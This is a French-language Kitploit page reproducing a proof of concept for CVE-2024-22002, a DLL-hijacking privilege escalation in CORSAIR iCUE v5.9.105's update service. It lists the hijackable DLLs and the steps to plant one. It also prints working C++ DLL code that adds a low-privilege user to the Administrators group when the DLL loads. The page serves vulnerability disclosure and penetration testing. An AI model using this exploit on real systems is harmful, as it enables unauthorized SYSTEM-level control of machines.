Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
iCUE_DllHijack_LPE-CVE-2024-22002 — Preuve de concept pour une vulnérabilité d'élévation de privilèges locaux (CVE-2024-22002) dans CORSAIR iCUE v5.9.105 via un détournement de DLL pendant le processus de mise à jour, permettant aux utilisateurs non privilégiés d'obtenir les privilèges SYSTEM. | Kitploit
Outils/GitHubGitHub/0xkickit/icue_dllhijack_lpe-cve-2024-22002
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHub0xkickit/icue_dllhijack_lpe-cve-2024-22002

iCUE_DllHijack_LPE-CVE-2024-22002

Preuve de concept pour une vulnérabilité d'élévation de privilèges locaux (CVE-2024-22002) dans CORSAIR iCUE v5.9.105 via un détournement de DLL pendant le processus de mise à jour, permettant aux utilisateurs non privilégiés d'obtenir les privilèges SYSTEM.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 2 ansPas encore vérifié

Logiciel et version vulnérables

  • Lien de téléchargement du logiciel : CORSAIR iCUE v5.9.105 avec iCUE Murals

Description

Une vulnérabilité de détournement de DLL (DLL Hijacking) a été identifiée dans iCUE v5.9.105. Cette vulnérabilité se produit lors du processus de mise à jour, géré par le service « iCUEUpdateService ». Le service lance un processus (« cuepkg.exe ») responsable de l'exécution de la mise à jour, s'exécutant avec les privilèges « NT AUTHORITY\SYSTEM ». Lors du démarrage du processus, il recherche plusieurs DLL dans le répertoire \cuepkg-1.2.6, situé dans le répertoire d'installation d'iCUE. Certaines de ces DLL ne sont pas présentes par défaut, mais comme un utilisateur ordinaire dispose des privilèges nécessaires pour créer des fichiers dans ce répertoire, un attaquant pourrait éventuellement introduire une DLL malveillante dans ce répertoire. Par conséquent, cette DLL malveillante serait chargée par cuepkg.exe avec des privilèges d'administrateur.

Les DLL affectées détectées sont les suivantes :

  • MSASN1.dll
  • NTASN1.dll
  • profapi.dll

Vecteur CVSS : (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

  • Score de base : 7,8 (Élevé)
  • Score temporel : 7,8 (Élevé)
  • Score environnemental : 7,8 (Élevé)

Preuve de concept (PoC)

À titre d'exemple, la DLL profapi.dll sera prise.

  1. Créer notre DLL malveillante et l'ajouter au répertoire %INSTALLDIR%cuepkg-1.2.6.
  2. Attendre que le programme se mette à jour automatiquement ou, dans ce cas, forcer la mise à jour en cliquant sur « Vérifier les mises à jour ».
  3. Notre utilisateur sans privilèges d'administrateur est ajouté au groupe.

Privilèges de l'utilisateur lowpriv avant l'exécution de la DLL malveillante : lowpriv_cmd

Privilèges de l'utilisateur lowpriv après l'exécution de la DLL malveillante : lowpriv_cmd_adm

  • Exemple de code malveillant :
root@kitploit:~
#include "pch.h"
#include <windows.h>
#include <cstdlib>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    {
        system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
    }
    break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    }

    return TRUE;
}
Télécharger l’outil